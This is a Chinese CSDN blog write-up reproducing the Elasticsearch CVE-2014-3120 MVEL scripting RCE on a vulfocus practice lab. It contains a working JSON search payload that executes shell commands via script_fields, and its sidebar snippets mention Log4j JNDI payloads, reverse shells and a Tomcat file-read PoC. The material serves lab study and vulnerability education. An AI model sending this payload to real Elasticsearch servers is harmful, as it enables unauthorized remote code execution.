cve_2014_3120-Elasticsearch-rce-vulfocus靶场

最新推荐文章于 2024-07-18 15:24:24 发布
最新推荐文章于 2024-07-18 15:24:24 发布
阅读量450 收藏 3
点赞数 3
分类专栏: web安全 文章标签: elasticsearch 大数据 搜索引擎 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c0529/article/details/139583432
版权

1.背景

来源:ElasticSearch(CVE-2014-3120)命令执行漏洞复现_mvel 漏洞-CSDN博客

参考:https://www.cnblogs.com/huangxiaosan/p/14398307.html

老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。
知识点普及:
1、Elasticsearch,是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。
2、Lucene,是apache软件基金会4 jakarta项目组的一个子项目,是一个开放源代码的全文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构,提供了完整的查询引擎和索引引擎,部分文本分析引擎。
3、沙盒,在计算机安全领域中是一种安全机制,为运行中的程序提供的隔离环境。通常是作为一些来源不可信、具破坏力或无法判定程序意图的程序提供实验之用。沙盒通常严格控制其中的程序所能访问的资源,所有改动对操作系统不会造成任何损失。

2.复现与vulfocus获取flag

待会要用的代码,由于es是用json方式传递的,所以我们需要json方式用java代码传递命令

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {}
        }
      }
    },
    "script_fields": {
        "command": {
            "script":"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

ulfocus打开环境选择9200这个端口的映射端口打开

抓包之后去先创建一条数据

传递java代码实现命令执行

修改这个命令就可以查看到flag

小狗学士
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
ElasticSearch命令执行漏洞(CVE-2014-3120)
ANOrange的博客
03-30 647
Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 影响版本:ES
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现
热门推荐
LiBai'S BLOG
01-05 2万+
这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shell Vuofocus http://vulfocus.fofa.so/ 启动靶场 Dnslog出网测试 http://www.dnslog.cn/ payload GET方式提交 payload payload=${jndi:ldap://X.X.X.X/exp} payload=${jndi:ldap://5e0s0v.dnslog.cn/exp} 用payload打的时候发现服务器返回404 原因是因为GET数据传输
CVE-2019-7609 kibana RCE漏洞复现
三天不打上房揭瓦的博客
04-15 1355
目录漏洞描述影响版本漏洞复现环境搭建反弹shell漏洞修复 漏洞描述 Kibana为 Elassticsearch设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在自标服务器上执行任意Javascript代码。 影响版本 5.6.15<=Kibana<=6.6.1 漏洞复现 环境搭建 小编这里图个方便直接使用vulhub靶场搭建环境 cd /root/vulhub/kibana/CVE-2019-7609 systcl -w vm.
[Vulfocus解题系列] 所复现漏洞总结
00勇士王子的博客
07-14 1万+
前言 写[Vulfocus解题系列]也有十天左右了,感觉虽然复现了一些漏洞,但是复现过后对这些漏洞的印象并不深刻,于是就有了写一篇总结篇的想法。把复现过的漏洞介绍、特征什么的总结过来,没事的时候看一看,加深一些印象,别之后别人闻起来某个漏洞,明明复现过,却忘了,那多不好意思。 已复现的Vulfocus靶场漏洞 Struts2-052远程代码执行(CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源
CVE-2021-44228)Apache_Log4j2_RCE漏洞复现(反弹shell教学)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-10 7249
Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文是log4j2的漏洞复现以及利用该漏洞进行命令执行RCE,反弹shell。
Apache Solr 远程命令执行漏洞(CVE-2017-12629)复现
HEAVEN569的博客
06-21 1291
Apache Solr 远程命令执行漏洞(CVE-2017-12629)复现
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 819
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞。
CVE-2017-12629 xxe漏洞复现
xinyue9966的博客
03-21 1106
一、实验介绍 1.漏洞介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。 2.影响版本 Apache Solr before 7.1 with Apache Lucene before 7.1 E
[春秋云镜]CVE-2015-1427
niubi707的博客
11-30 5500
春秋云镜CVE-2015-1427 ElasticSearch RCE
CVE-2014-4113-exp.zip_CVE-2014-4113_cve_cve-2014-4113提权
09-24
CVE-2014-4113提权漏洞利用代码,国外大牛将最初只能在win7上使用的代码扩展到了win8上可用。python开发~
CVE-2014-0322.zip_cve_cve 2014 _zip
09-14
标题中的"CVE-2014-0322.zip_cve_cve 2014 _zip"指的是一个与2014CVE(Common Vulnerabilities and Exposures)编号相关的安全问题,具体是CVE-2014-0322。这个编号通常用于标识已知的安全漏洞,便于跟踪和解决。...
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
标题中的"CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999"提及了几个关键概念,首先,CVE(Common Vulnerabilities and Exposures)是用于识别网络安全漏洞的标准化系统。"CVE-2018-9995"指的是...
CVE-2018-2628-MultiThreading-master.zip_CVE20182628_cve-2018-262
09-21
# CVE-2018-2628 # 用法:将需要检测的 ip:port 放入同目录下的url.txt文件中。然后运行:(代码93行处修改线程数) `python CVE-2018-2628-MultiThreading.py` Usage: Place the 'ip:port' to be detected into...
Elasticsearch基础(三)
weixin_68441705的博客
07-17 679
查询的DSL是一个大的JSON对象,包含下列属性:query:查询条件from和size:分页条件sort:排序条件highlight:高亮条件。
ES中Root mapping definition has unsupported parameters解决方案
MADAO的博客
07-14 459
ES中Root mapping definition has unsupported parameters解决方案
elasticsearch容易遇到的问题
weixin_44628581的博客
07-14 580
1 检查我的 启动脚本 也是正常的 用了elsearch用户启动(非root用户启动 elasticsearch)这里对应着 /usr/local/elasticsearch/config/elasticsearch.yml。备注 :刚刚配置完 还没开始配与其他虚拟机的交互以及自己的其他服务端口需求 所以必须3G+2 继续翻上面的错误日志 能看到bootstrap checks faild 报错。1 问题1 运行内存 低于 2G 带不动 推荐是3G。2 9300 端口一起来 就断掉。
深入剖析CommonJS modules和ECMAScript modules
最新发布
BDawn的专栏
07-18 573
在 JavaScript 生态系统中,模块化编程已经成为构建大型、可维护应用的关键技术。CommonJS 和 ECMAScript Modules (ESM) 作为两种主要的模块化标准,各自承载着历史的重量和未来的愿景。本文将深入探讨这两种模块系统的设计哲学、语法差异、运行时行为以及在现代开发环境中的地位变迁。
Tomact_CVE-2020-1938漏洞复现
08-31
要复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值